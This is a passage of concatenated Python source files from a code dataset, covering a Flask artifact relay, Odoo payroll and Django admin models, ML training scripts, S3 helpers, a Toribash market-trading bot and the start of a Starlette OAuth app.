close_db(error):\n if hasattr(g, 'sqlite_db'):\n g.sqlite_db.close()\n\n\ndef get_new_path(old_path):\n path_list = old_path.split(\"/\")[2:]\n new_path = \"\"\n for i in path_list:\n new_path = new_path + \"/\" + i\n new_path = \"/artifactory/v1.0/artifacts/libs-release-local\" + new_path\n return new_path\n\n\ndef create_request(path):\n path_list = path.split(\"/\")\n artifact_name = path_list[len(path_list)]\n\n\n# @app.route('/', defaults={'path': ''}, methods=['GET'])\n@app.route('/', methods=['GET', 'HEAD', 'POST'])\ndef relay(path):\n \"\"\" POST/GET method handler\n POST call is relayed in accordance with relay_mapping global dict object\n GET call is more of a debug call, relayed to all the URLs\n \"\"\"\n\n total.inc(1)\n elb = \"http://10.85.59.116\"\n\n app.logger.info(\"Path received from artifactory: {}\".format(path))\n\n new_path = get_new_path(path)\n # # for artPath in path.split(\"/\")[2:]:\n # # artPath=\n #\n # old_path = path\n # new_path = re.sub(r'libs-(snapshot(s?)|release(s?))(-(local))*', \"v1.0/artifacts/libs-release-local\", path)\n app.logger.info(\"Sending request to: {} \".format(elb + new_path))\n\n ret_tup = (\"Bad Request\", 400)\n if request.method == 'GET' and \"artifactory\" in path:\n\n try:\n res = requests.get(elb + new_path, timeout=2)\n except ConnectionError as e:\n app.logger.error(\"Error {} connecting to ELB {}: \".format(e.message, elb))\n raise exceptions.ConnectionError\n\n db.counter.insert(\n {\"old_path\": path, \"new_path\": new_path, \"status_code\": res.status_code, \"http_method\": request.method})\n if res.status_code != 200:\n app.logger.error(\"artifact not found for path: {}\".format(new_path))\n response = {\"Artifact Not found for path\": new_path}\n\n return jsonify(response), res.status_code\n\n else:\n success_counter.inc()\n app.logger.info(\"Artifact found for path: {}\".format(path))\n ret_tup = (\"Artifact Found\", 200)\n elif request.method == 'HEAD' and \"artifactory\" in path:\n try:\n res = requests.head(elb + new_path, timeout=2)\n except ConnectionError as e:\n app.logger.error(\"Error {} connecting to ELB {}: \".format(e.message, elb))\n raise exceptions.ConnectionError\n\n db.counter.insert(\n {\"old_path\": path, \"new_path\": new_path, \"status_code\": res.status_code, \"http_method\": request.method})\n if res.status_code != 200:\n app.logger.error(\"artifact not found for path: {}\".format(new_path))\n response = {\"Artifact Not found for path\": new_path}\n\n return jsonify(response), res.status_code\n\n else:\n success_counter.inc()\n app.logger.info(\"Artifact found for path: {}\".format(path))\n ret_tup = (\"Artifact Found\", 200)\n\n elif request.method == 'POST' and 'artifactory' in path:\n db.counter.insert({'http_method': request.method, \"old_path\": path})\n else:\n app.logger.error(\"method type {} not handled\".format(request.method))\n\n return ret_tup\n\n\ndef failed_count():\n regex = re.compile('^((?!maven-metadata).)*$', re.IGNORECASE)\n req_failed = db.counter.find({'$and': [{\"old_path\": regex}, {\"status_code\": 404}]})\n result = db.counter.find({\"status_code\": 404})\n result_set = set()\n for entry in result:\n # print entry\n temp_arr = entry['old_path'].split(\"/\")[2:]\n path = ''\n for a in temp_arr:\n path = path + \"/\" + a\n if \".sha1\" not in path and 'maven-metadata' not in path and '.md5' not in path:\n result_set.add(path)\n # for a in result_set:\n # print a\n # print result.count(), len(result_set)\n return len(result_set)\n\n\n@app.route('/stats', methods=['GET'])\ndef stats():\n regex = re.compile('^((?!maven-metadata).)*$', re.IGNORECASE)\n # maven_meta = db.counter.find({\"old_path\":regex}).count()\n\n tot_num_of_requests = db.counter.find({'$and': [{\"old_path\": regex}, {\"http_method\": \"GET\"}]}).count()\n\n # tot_num_of_requests = db.counter.find({\"http_method\": \"GET\"}).count()\n\n # req_failed = db.counter.find({\"status_code\": 404}).count()\n # req_success = db.counter.find({\"status_code\": 200}).count()\n # req_redirected = db.counter.find({\"status_code\": 307}).count()\n # req_upload = db.counter.find({\"http_method\": 'POST'}).count()\n\n # req_failed = db.counter.find({'$and': [{\"old_path\": regex}, {\"status_code\": 404}]}).count()\n req_failed = failed_count()\n req_success = db.counter.find({'$and': [{\"old_path\": regex}, {\"status_code\": 200}]}).count()\n req_redirected = db.counter.find({'$and': [{\"old_path\": regex}, {\"status_code\": 307}]}).count()\n req_upload = db.counter.find({'$and': [{\"old_path\": regex}, {\"http_method\": \"POST\"}]}).count()\n\n response = {\"Total\": tot_num_of_requests, \"Success\": req_success, \"Failed\": req_failed,\n \"Requests_redirected\": req_redirected, \"Upload Requests\": req_upload}\n return jsonify(response)\n\n\nif __name__ == \"__main__\":\n # start_http_server(8000)\n # start_wsgi_server(app.config['PROMETHEUS_PORT'], addr='172.20.97.183')\n # db.create_all()\n # app.run(host='172.20.97.183', port=5000)\n # app.run(host=\"172.20.148.92\",port=5000)\n app.run()\n","sub_path":"artifactory/scripts/Relayer/relayer/relayer.py","file_name":"relayer.py","file_ext":"py","file_size_in_byte":7669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"439130751","text":"import time\nfrom datetime import datetime, timedelta\nfrom dateutil import relativedelta\n\nfrom odoo import api, fields, models, tools, _\nfrom odoo.exceptions import UserError, ValidationError\n\n\nclass VrPayslipBatches(models.Model):\n\t_name = \"hr.afg.payroll.batches\"\n\n\n\tname = fields.Char(required=True, readonly=True, states={'draft': [('readonly', False)]})\n\tslip_ids = fields.One2many('hr.afg.payroll', 'payslip_run_id', string='Payslips', readonly=True,\n\t\tstates={'draft': [('readonly', False)]})\n\tstate = fields.Selection([\n\t\t('draft', 'Draft'),\n\t\t('close', 'Close'),\n\t\t('done', 'Done'),\n\t\t], string='Status', index=True, readonly=True, copy=False, default='draft')\n\tdate_start = fields.Date(string='Date From', required=True, readonly=True,\n\t\tstates={'draft': [('readonly', False)]}, default=time.strftime('%Y-%m-01'))\n\tdate_end = fields.Date(string='Date To', required=True, readonly=True,\n\t\tstates={'draft': [('readonly', False)]},\n\t\tdefault=str(datetime.now() + relativedelta.relativedelta(months=+1, day=1, days=-1))[:10])\n\tcredit_note = fields.Boolean(string='Credit Note', readonly=True,\n\t\tstates={'draft': [('readonly', False)]},\n\t\thelp=\"If its checked, indicates that all payslips generated from here are refund payslips.\")\n","sub_path":"afg_payroll/models/payslip_batches.py","file_name":"payslip_batches.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"484345239","text":"from django.contrib import admin\r\nfrom .models import Client_Task\r\n\r\n# Register your models here.\r\n\r\nclass MainAdmin(admin.ModelAdmin):\r\n\tlist_display = (\r\n\t'veh_model',\r\n\t'veh_type',\r\n\t'veh_state',\r\n\t'tariff',\r\n\t'budget',\r\n\t'add_date',\r\n\t)\r\n\r\nadmin.site.register(Client_Task, MainAdmin)\r\n","sub_path":"apps/greenhub_auction/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"648230416","text":"from city import *\nfrom random import randint\nfrom math import sqrt\n\nclass ant:\n\n def __init__(self, city):\n self.city = city\n self.pos = city.position\n self.visited = [city]\n self.distance = 0\n self.dis_next_position = 0\n self.counter = 0\n\n##boulean pour tester si on a passe la ville\n def path_visited(self, path):\n pos = path[\"position\"]\n for i in self.visited:\n if pos == i.position:\n return True\n return False\n##la distance pour aller à la prochine ville\n##trouver la prochaine ville qu'on va y aller\n def next_position(self):\n def distance(p1, p2):\n return sqrt((p1[0] - p2[0]) ** 2 + (p1[1] - p2[1]) ** 2)\n possible_citys = []\n for i in self.city.path:\n if not self.path_visited(i):\n possible_citys.append(i)\n\n sum_info = 0\n dart = []\n\n for i in possible_citys:\n sum_info += i[\"info\"]\n dart.append(sum_info)\n sum_info = int(sum_info)\n\n rand = randint(0, sum_info)\n for i in range(len(dart)):\n if rand < i:\n pos = possible_citys[i][\"position\"]\n for i in self.city.path:\n if i[\"position\"] == pos:\n i[\"info\"] += INFO / i[\"distance\"]\n tmp = self.pos\n self.pos = pos\n self.distance += distance(tmp, pos)\n self.dis_next_position = distance(tmp, pos)\n #print(pos)\n\n##length qu'on a passe pour 1 fourmi\n def calcule_distance(self):\n def distance(p1, p2):\n return sqrt((p1[0] - p2[0]) ** 2 + (p1[1] - p2[1]) ** 2)\n res = 0\n for i in range(len(self.visited) - 1):\n res += distance(self.visited[i - 1].position, self.visited[i].position)\n return res\n\n\n\n\n\n","sub_path":"python/TSP/ant.py","file_name":"ant.py","file_ext":"py","file_size_in_byte":1883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"233197501","text":"import os, pathlib\n\nimport dummy_data_generator\nimport feature_extractors\nimport scoring\n\nimport numpy as np\nimport random\n\nimport tensorflow as tf\nfrom tensorflow import keras \nK = keras.backend\n\nLATENT_DIM = 128\n\ndef _build_model(constants):\n encoder_inputs = keras.Input(shape=(constants['MAX_SEQ_LEN'], constants['X_DIM']))\n\n masking_layer = keras.layers.Masking(mask_value=constants['MASK_VALUE'])\n masked_inputs = masking_layer(encoder_inputs)\n \n encoder = keras.layers.LSTM(LATENT_DIM, return_state=True)\n _, state_h, state_c = encoder(masked_inputs)\n encoder_states = [state_h, state_c]\n\n decoder_inputs = keras.Input(shape=(constants['MAX_SEQ_LEN'], constants['Y_DIM']))\n\n decoder_lstm = keras.layers.LSTM(LATENT_DIM, return_sequences=True, return_state=True)\n decoder_dense = keras.layers.Dense(constants['Y_DIM'], activation=None)\n\n decoder_outputs, _, _ = decoder_lstm(decoder_inputs,\n initial_state=encoder_states)\n # decoder_outputs, _, _ = decoder_lstm(decoder_inputs)\n decoder_outputs = decoder_dense(decoder_outputs)\n #decoder_outputs = tf.compat.v1.Print(decoder_outputs, [decoder_outputs], summarize=100)\n\n\n m = keras.Model([encoder_inputs, decoder_inputs], decoder_outputs)\n return m\n\ndef train():\n train_data, test_data, constants = feature_extractors.load_dataset()\n encoder_input_data, decoder_input_data, decoder_target_data = train_data\n model = _build_model(constants)\n\n l = keras.losses.MeanSquaredError()\n o = keras.optimizers.Adam(learning_rate=0.005)\n model.compile(optimizer=o, loss=l)\n model.fit([encoder_input_data, decoder_input_data], decoder_target_data,\n batch_size=32,\n epochs=100,\n validation_split=0.05)\n model.save('chorale_model_128')\n\ndef predict():\n train_data, test_data, constants = feature_extractors.load_dataset()\n encoder_input_data, decoder_input_data, decoder_target_data = test_data\n\n model = keras.models.load_model('chorale_model_128')\n \n # Extract encoder from graph\n encoder_inputs = model.input[0]\n _, state_h_enc, state_c_enc = model.layers[3].output # lstm_1\n encoder_states = [state_h_enc, state_c_enc]\n encoder_model = keras.Model(encoder_inputs, encoder_states)\n\n # Extract decoder from graph\n decoder_inputs = model.input[1]\n decoder_state_input_h = keras.Input(shape=(LATENT_DIM,), name=\"input_3\")\n decoder_state_input_c = keras.Input(shape=(LATENT_DIM,), name=\"input_4\")\n decoder_states_inputs = [decoder_state_input_h, decoder_state_input_c]\n\n decoder_lstm = model.layers[-2]\n decoder_dense = model.layers[-1]\n\n decoder_outputs, state_h_dec, state_c_dec = decoder_lstm(\n decoder_inputs, initial_state=decoder_states_inputs\n )\n decoder_states = [state_h_dec, state_c_dec]\n decoder_outputs = decoder_dense(decoder_outputs)\n decoder_model = keras.Model(\n [decoder_inputs] + decoder_states_inputs,\n [decoder_outputs] + decoder_states\n )\n\n def _terminate(toks):\n return np.isclose(np.mean(-1 - toks), 0.0, atol=0.5)\n \n def decode(input_seq):\n states_value = encoder_model.predict(np.array([input_seq]))\n target_seq = np.ones((1, 1, constants['Y_DIM'])) * -1.\n\n result = []\n stop = False\n for _ in range(100):\n output_tokens, h, c = decoder_model.predict(\n [target_seq] + states_value)\n if _terminate(output_tokens):\n return result\n result.append(output_tokens)\n\n target_seq = np.ones((1, 1, constants['Y_DIM'])) * output_tokens\n states_value = [h, c]\n print(\"Decoding did not terminate! Returning large RNA.\")\n return result\n\n def cut_off_ground_truth(ground_truth):\n res = []\n for g in ground_truth:\n if _terminate(g):\n return res\n res.append(g)\n print(\"Ground truth does not terminate! Returning large RNA.\")\n\n\n err_rates = []\n len_diffs = []\n for chorale_ind in range(len(encoder_input_data))[:15]:\n print(\"Eval for chorale \" + str(chorale_ind))\n decoded = decode(encoder_input_data[chorale_ind])\n decoded_rna_chords = [feature_extractors.RNAChord(encoding=decoded[i][0][0]) for i in range(len(decoded))]\n\n ground_truth = cut_off_ground_truth(decoder_target_data[chorale_ind])\n ground_truth_chords = [feature_extractors.RNAChord(encoding=ground_truth[i]) for i in range(len(ground_truth))]\n\n errs = scoring.levenshtein(ground_truth_chords, decoded_rna_chords, equality_fn=scoring.EQUALITY_FNS['key_enharmonic'])\n print(len(ground_truth_chords) - len(decoded_rna_chords))\n len_diffs.append(len(ground_truth_chords) - len(decoded_rna_chords))\n err_rates.append(float(errs / len(ground_truth_chords)))\n print(\"Error rate: \" + str(np.mean(err_rates)))\n print(\"Len diff: \" + str(np.mean(len_diffs)))\n # for c in ground_truth_chords:\n # print(c)\n # print(\"-----------------------------------------------------\")\n # for c in decoded_rna_chords:\n # print(c)\n\n\n\n\n#train()\npredict()","sub_path":"code/seq2seq_model.py","file_name":"seq2seq_model.py","file_ext":"py","file_size_in_byte":5182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"29161510","text":"import asyncio\nimport socket\nimport unittest\n\nfrom functools import wraps\n\n\ndef run_until_complete(fun):\n if not asyncio.iscoroutinefunction(fun):\n fun = asyncio.coroutine(fun)\n\n @wraps(fun)\n def wrapper(test, *args, **kw):\n loop = test.loop\n ret = loop.run_until_complete(\n asyncio.wait_for(fun(test, *args, **kw), 15, loop=loop))\n return ret\n return wrapper\n\n\ndef find_unused_port():\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.bind(('127.0.0.1', 0))\n port = s.getsockname()[1]\n s.close()\n return port\n\n\nclass BaseTest(unittest.TestCase):\n \"\"\"Base test case for unittests.\n \"\"\"\n def setUp(self):\n self.loop = asyncio.new_event_loop()\n asyncio.set_event_loop(None)\n self.port = find_unused_port()\n self.url = \"http://127.0.0.1:{}\".format(self.port)\n\n def tearDown(self):\n self.loop.close()\n del self.loop\n","sub_path":"tests/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"551169059","text":"import boto3\nimport botocore.exceptions\nimport sys\n\n#bucket actions and features\n\ns3session = boto3.Session(profile_name='s3operator')\ns3client = s3session.resource('s3')\n\n\ndef list_buckets():\n '''list all bucket name within the session'''\n print('buckets:\\n\\t', *[b.name for b in s3client.buckets.all()], sep='\\n\\t')\n\ndef create_delete_bucket(bucket_name, isdelete):\n list_buckets()\n try:\n print('\\ncreating the new bucket: ', bucket_name)\n bucket = s3client.create_bucket(Bucket=bucket_name)\n\n except botocore.exceptions.ClientError as e:\n print('AWS ClientError:', e)\n sys.exit('Exit due to the failure of bucket creation.')\n\n bucket.wait_until_exists()\n list_buckets()\n\n if isdelete:\n print('\\n deleting the bucket: ', bucket_name)\n bucket.delete()\n bucket.wait_until_not_exists()\n list_buckets()\n else:\n print('\\ncreated the bucket: ', bucket_name)\n\n\ndef list_bucket_content(bucket_name, prefix='', filter_key=''):\n '''list all keys fit filter_key in the buckets\n eg. look for png file in the pictures folder, prefix='pictures'\n filter_key='.png' '''\n try:\n bucket = s3client.Bucket(bucket_name)\n if bool(prefix):\n bucket_objects = bucket.objects.filter(Prefix=prefix)\n else:\n bucket_objects = bucket.objects.all()\n\n for bo in bucket_objects:\n if filter_key in bo.key:\n print(bo.key)\n\n except botocore.exceptions.ClientError as e:\n print('AWS ClientError at list bucket content:', e)\n\n\ndef delete_files_in_bucket(bucket_name, prefix, inclusive='', exclusive=''):\n '''delete a set of files defined by prefix, inclusive, exclusive\n in a bucket by two api calls: one get the list of files, the other to call delete'''\n try:\n # get a list of files to be deleted\n bucket =s3client.Bucket(bucket_name)\n object_list = list()\n one_object =dict()\n for bo in bucket.objects.filter(Prefix=prefix):\n if (inclusive in bo.key) and not ( exclusive in bo.key):\n one_object['Key'] = bo.key\n object_list.append(one_object)\n one_object =dict()\n\n delete_objects=dict()\n delete_objects['Objects'] = object_list\n\n # one api call to delete all files in the list\n # and parse the response to check if it is deleted or not\n delete_resp = bucket.delete_objects(Delete=delete_objects)\n for d in delete_resp['Deleted']:\n print('The file {0} is deleted? {1}.'.format(d['Key'], d['DeleteMarker']))\n\n '''\n #check the content\n for k,v in delete_objects.items():\n print(f'delete_objects key:{k}')\n for one_item in v:\n print(one_item['Key'])\n '''\n\n except botocore.exceptions.ClientError as e:\n print(f'AWS Client error in delete_bucket_files: {e}')\n\n\n\nif __name__ == '__main__':\n delete_files_in_bucket('philadelphiasixers', prefix='sixers2020-08', inclusive='2020-08-19')\n #delete_files_in_bucket('philadelphiasixers', prefix='sixers', inclusive='2020-03-03-12', exclusive='-33-')\n #create_delete_bucket('zhijianchenbucketxyx666', False)\n #list_bucket_content('phillybucketlist', 'pictures', '.pdf')\n #list_bucket_content('philadelphiasixers', prefix='sixers')\n","sub_path":"s3/bucket_operator.py","file_name":"bucket_operator.py","file_ext":"py","file_size_in_byte":3373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"600388105","text":"# vim: tabstop=4 shiftwidth=4 softtabstop=4\n\n# Copyright (C) 2012 Yahoo! Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom pkg_resources import Requirement\n\nfrom anvil import shell as sh\n\nFREEZE_CMD = ['freeze', '--local']\n\n# Cache of whats installed - 'uncached' as needed\n_installed_cache = None\n\n\ndef uncache():\n global _installed_cache\n _installed_cache = None\n\n\ndef _list_installed(pip_how):\n cmd = [pip_how] + FREEZE_CMD\n (stdout, _stderr) = sh.execute(*cmd)\n installed = []\n for line in stdout.splitlines():\n line = line.strip()\n if not line or line.startswith('#'):\n continue\n # Don't take editables either...\n if line.startswith('-e'):\n continue\n # We need to adjust the == that freeze produces\n # to instead have <= so that later when we ask\n # if a version matches it will say yes it does and\n # not just for exactly the same version\n if line.find('==') != -1:\n line = line.replace('==', '<=')\n try:\n installed.append(Requirement.parse(line))\n except ValueError:\n pass\n return installed\n\n\ndef _whats_installed(pip_how):\n global _installed_cache\n if _installed_cache is None:\n _installed_cache = _list_installed(pip_how)\n return _installed_cache\n\n\ndef is_installed(pip_how, name, version=None):\n if get_installed(pip_how, name, version):\n return True\n return False\n\n\ndef get_installed(pip_how, name, version=None):\n name_lc = name.lower()\n whats_there = _whats_installed(pip_how)\n for req in whats_there:\n if not (name_lc == req.key):\n continue\n if not version:\n return req\n if version in req:\n return req\n return None\n","sub_path":"anvil/packaging/helpers/pip_helper.py","file_name":"pip_helper.py","file_ext":"py","file_size_in_byte":2336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"583463687","text":"import numpy as np\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.functional as F\nfrom torch.autograd import Variable\n\nfrom tqdm import tqdm\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\ntorch.set_default_dtype(torch.float64)\n\n\ndef train_simplenet(model, dataset, optimizer, nepochs, batch_size):\n criterion = nn.MSELoss()\n \n pbar = tqdm(range(nepochs))\n\n x_train, y_train, x_test, y_test = dataset\n ndatapoints = len(x_train)\n\n for epoch in pbar:\n indices = np.random.randint(0, ndatapoints, batch_size)\n x_batch = x_train[indices]\n y_batch = y_train[indices]\n\n X = Variable(torch.from_numpy(x_batch)).to(device)\n Y = Variable(torch.from_numpy(y_batch)).to(device)\n\n y_pred = model(X)\n loss = criterion(y_pred, Y)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n if epoch % 20 == 0: \n with torch.no_grad():\n X = Variable(torch.from_numpy(x_test)).to(device)\n Y = Variable(torch.from_numpy(y_test)).to(device)\n\n y_pred = model(X)\n loss = criterion(y_pred, Y).mean()\n \n pbar.set_description(f\"Epoch {epoch}; Loss {np.round(loss.item(), 5)}\")\n\n\ndef evaluate_simplenet(model, dataset):\n criterion = nn.MSELoss()\n with torch.no_grad():\n _, _, x_test, y_test = dataset\n X = Variable(torch.from_numpy(x_test)).to(device)\n Y = Variable(torch.from_numpy(y_test)).to(device)\n\n y_pred = model(X)\n loss = criterion(y_pred, Y).mean()\n\n return loss.item()","sub_path":"train_nn/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"319042862","text":"import time\nimport bs4\nfrom bs4 import BeautifulSoup\nimport http.cookiejar\nfrom http.cookiejar import CookieJar\nimport json\nimport urllib.request\nimport urllib.parse\nimport math\nimport config\nimport re\n\n\ncj = CookieJar()\ncookie_processor = urllib.request.HTTPCookieProcessor(cj)\nopener = urllib.request.build_opener(cookie_processor)\nopener.addheaders = [('User-agent', \"Mozilla/5.0 (X11; U; Linux i686) Gecko/20071127 Firefox/2.0.0.11\")]\n\nBASE = \"http://forum.toribash.com/\"\n\n\n\n\ndef login():\n \n form_data = {\"username\": config.username, \"password\": config.password, \"submit\": \"Login\"}\n data = urllib.parse.urlencode(form_data)\n binary_data = data.encode('utf-8') \n req = opener.open(BASE + \"tori.php\", binary_data)\n response = req.read()\n\ndef get(url, *args):\n data = \"login.php\"\n binary_data = data.encode('utf-8')\n fullurl = BASE + url\n response = opener.open(fullurl, *args, timeout=15).read()\n\t\t\n if binary_data in response:\n login()\n return get(url, *args)\n return response\n\ndef tc(username):\n time.sleep(2)\n r = get(\"tori_stats.php?format=json&username=IceColor\")\n decoded = r.decode('utf-8')\n status = json.loads(decoded)\n return status.get(\"tc\", \"0\")\n\t\t\ndef inventory(sid=0, userid=None):\n #sid = 0 = deactivated\n #sid = -1 = activated\n #sid = -2 = market\n\n page = get(\"tori_inventory.php?%s\" % urllib.parse.urlencode({\"sid\": sid, \"userid\": userid} if userid else {\"sid\": sid}))\n soup = BeautifulSoup(page)\n items = []\n\n for item in soup.find_all(\"tr\", class_=lambda s: s in [\"market_active\", \"\"]):\n id_ = int(item.find(\"input\").attrs[\"value\"])\n items.append({\"id\": id_, \"name\": item.span.text})\n\n return items\n\t\t\ndef search(item, max = 0, page = 1, action=\"search\"):\n\t\titems = []\n\n\t\tpage = get(\"tori_market.php?%s\" % urllib.parse.urlencode({\"action\": action, \"item\": item, \"max\": max, \"page\": page, \"format\": \"json\"}))\n\t\tpaged = page.decode('utf-8')\n\t\tpjson = json.loads(paged)\n\t\treturn (pjson[\"items\"])\n\t\t\ndef newest(page):\n\t\treturn search(\"\", \"\", page, \"\")\n\ndef buy(item):\n\t\tfu = urllib.parse.urlencode({\"inv\": item})\n\t\tf = fu.encode('utf-8')\n\t\tget(\"tori_market.php?action=buy_item\", f)\n\t\t\ndef sell(item_id, price):\n\t\tru = (\"tori_item.php?\" + urllib.parse.urlencode({\"invid\": item_id, \"action\": \"setprice\"}))\n\t\tfu = urllib.parse.urlencode({\"amount\": price})\n\t\tf = fu.encode('utf-8')\n\t\tget(ru, f)\n\t\t\n\ndef remove_from_market(item_id):\n\t\tget(\"tori_inventory.php?\" + urllib.parse.urlencode({\"action\": \"sale\", \"do\": \"remove\", \"inv\": item_id}))\n\t\t\ndef selling_price(item):\n\t\titems = json.load(open(\"items.json\"))\n\t\titem_names = {}\n\t\t\n\t\tfor i in range(0, len(items)):\n\t\t\t\titem_names[i] = {0: items[i][\"itemname\"].lower()}\n\t\t\t\tif item.lower() in item_names[i][0]:\n\t\t\t\t\titem = item_names[i][0]\n\t\t\t\t\tmarket_items = search(item)\n\t\t\t\t\tdiscount = 1\n\t\t\t\t\tif market_items:\n\t\t\t\t\t\tmarket_item = sorted(market_items, key=lambda k: k[\"price\"])[0]\n\t\t\t\t\t\tmin_price = market_item[\"price\"]\n\t\t\t\t\t\treturn int(min_price * discount)\n\t\t\t\t\telse:\n\t\t\t\t\t\treturn int(int(items[i][\"price\"]-1))\n\t\t\n\t\t\n\ndef market_stats(page = 0):\n\t\tf = open(\"m.json\", \"r+\")\n\t\th = open(\"h.json\", \"r+\")\n\t\tfjson = json.load(f)\n\t\thjson = json.load(h)\n\t\thjsonval = {}\n\t\t\n\t\tfor key in hjson:\n\t\t\tfor i in hjson[key]:\n\t\t\t\thjsonval[len(hjsonval)] = hjson[key][i][\"inventid\"]\n\t\t\t\t\n\t\t\t\t\n\t\t\n\t\tfjsonval = {i[\"inventid\"] for i in fjson.values()}\n\t\t\n\t\tnewh= newest(page)\n\t\n\t\t\n\t\t\n\t\tfor i in range(0,len(newh)):\n\t\t\t\n\t\t\tif not newh[i][\"inventid\"] in fjsonval:\n\t\t\t\tfjson[str(len(fjson)+1)] = newh[i]\n\t\t\t\tprint(\"Wrote item to file\", newh[i][\"name\"], newh[i][\"price\"])\n\t\t\telif newh[i][\"inventid\"] in fjsonval:\n\t\t\t\tfor c in range(1, len(fjson)+1):\n\t\t\t\t\tif newh[i][\"inventid\"] == fjson[str(c)][\"inventid\"] and newh[i][\"price\"] != fjson[str(c)][\"price\"]:\n\t\t\t\t\t\tfjson[str(c)][\"price\"] = newh[i][\"price\"]\n\t\t\t\t\t\tprint(\"Price Update for item made:\", newh[i][\"name\"], newh[i][\"price\"])\n\t\t\t\t\t\t\n\t\tfor i in range(0, len(newh)):\n\t\t\n\t\t\tif not newh[i][\"inventid\"] in hjsonval.values():\n\t\t\t\t\n\t\t\t\ttry:\n\t\t\t\t\thjson[newh[i][\"name\"]] = {len(hjson[newh[i][\"name\"]])-1:{ \"price\": newh[i][\"price\"], \"inventid\": newh[i][\"inventid\"], \"market_date\": newh[i][\"market_date\"]}}\n\t\t\t\t\tprint(\"Wrote price statistic with:\", newh[i][\"name\"], newh[i][\"price\"], newh[i][\"market_date\"])\n\t\t\t\texcept KeyError:\n\t\t\t\t\thjson[newh[i][\"name\"]] = {}\n\t\t\t\t\thjson[newh[i][\"name\"]] = {\"0\":{ \"price\": newh[i][\"price\"], \"inventid\": newh[i][\"inventid\"], \"market_date\": newh[i][\"market_date\"]}}\n\t\t\t\t\t\n\t\t\t\t\n\t\t\telif newh[i][\"inventid\"] in hjsonval.values():\n\t\t\t\ttry:\n\t\t\t\t\tif newh[i][\"inventid\"] == hjson[newh[i][\"name\"]][len(hjson[newh[i][\"name\"]])-1][\"inventid\"] and newh[i][\"price\"] != hjson[newh[i][\"name\"]][len(hjson[newh[i][\"name\"]])-1][\"price\"]:\n\t\t\t\t\t\thjson[newh[i][\"name\"]][\"price\"] = newh[i][\"price\"]\n\t\t\t\t\t\thjson[[newh[i][\"name\"]]][\"market_date\"] = newh[i][\"market_date\"]\n\t\t\t\t\t\tprint(\"Updated price statistic with:\", newh[i][\"name\"], newh[i][\"price\"])\n\t\t\t\texcept KeyError:\n\t\t\t\t\tpass\n\t\t\t\t\t\n\t\t\t\t\n\t\t\t\n\t\t\t\n\t\t\t\n\t\t\"\"\"for x in range(1,len(fjson)+1):\n\t\t\tprint(fjson[str(x)][\"name\"], fjson[str(x)][\"price\"],\"\\t\\t\", fjson[str(x)][\"username\"] )\"\"\"\n\t\t\n\t\t\n\t\tfunjson = json.dumps(fjson)\n\t\tf.seek(0)\n\t\tf.truncate()\n\t\tf.write(funjson)\n\t\tf.close()\n\t\t\n\t\thunjson = json.dumps(hjson)\n\t\th.seek(0)\n\t\th.truncate()\n\t\th.write(hunjson)\n\t\th.close()\n\t\t\ndef item_val(name):\n\t\tk = search(name, 999999)\n\t\treturn k\n\n\t\t\n\t\t\n\nwhile True:\n\tmarket_stats()\n\ttime.sleep(5)\n\n\n\n\n\n","sub_path":"market.py","file_name":"market.py","file_ext":"py","file_size_in_byte":5564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"519131253","text":"import copy\npages=int(input())\n\ndays=input()\n\ndays=days.split(\" \")\ntemp=copy.deepcopy(pages)\ni=0\nwhile(temp>0):\n if i<=6:\n p=int(days[i])\n temp-=p\n i+=1\n else:\n i=0\n\nif i% 7==0:\n print(7)\nelse:\n print(i%7)","sub_path":"139A - petr and book codeforces.py","file_name":"139A - petr and book codeforces.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"59469565","text":"from datetime import datetime\n\nimport databases\nimport sqlalchemy\nimport uvicorn\nimport jwt\nfrom sqlalchemy import and_, text\nfrom starlette.applications import Starlette\nfrom starlette.authentication import requires\nfrom starlette.config import Config\nfrom starlette.middleware import Middleware\nfrom starlette.middleware.authentication import AuthenticationMiddleware\nfrom starlette.middleware.cors import CORSMiddleware\nfrom starlette.middleware.sessions import SessionMiddleware\nfrom starlette.responses import JSONResponse, RedirectResponse\nfrom starlette.routing import Route\nfrom starlette.requests import Request\nfrom authlib.integrations.starlette_client import OAuth\nfrom starlette_jwt import JWTAuthenticationBackend\n\nconfig = Config('.env')\nDATABASE_URL = config('DATABASE_URL')\nmetadata = sqlalchemy.MetaData()\noauth = OAuth(config)\noauth.register(\n name='google',\n server_metadata_url='https://accounts.google.com/.well-known/openid-configuration',\n client_kwargs={\n 'scope': 'openid email profile'\n }\n)\noauth.register(\n name='github',\n 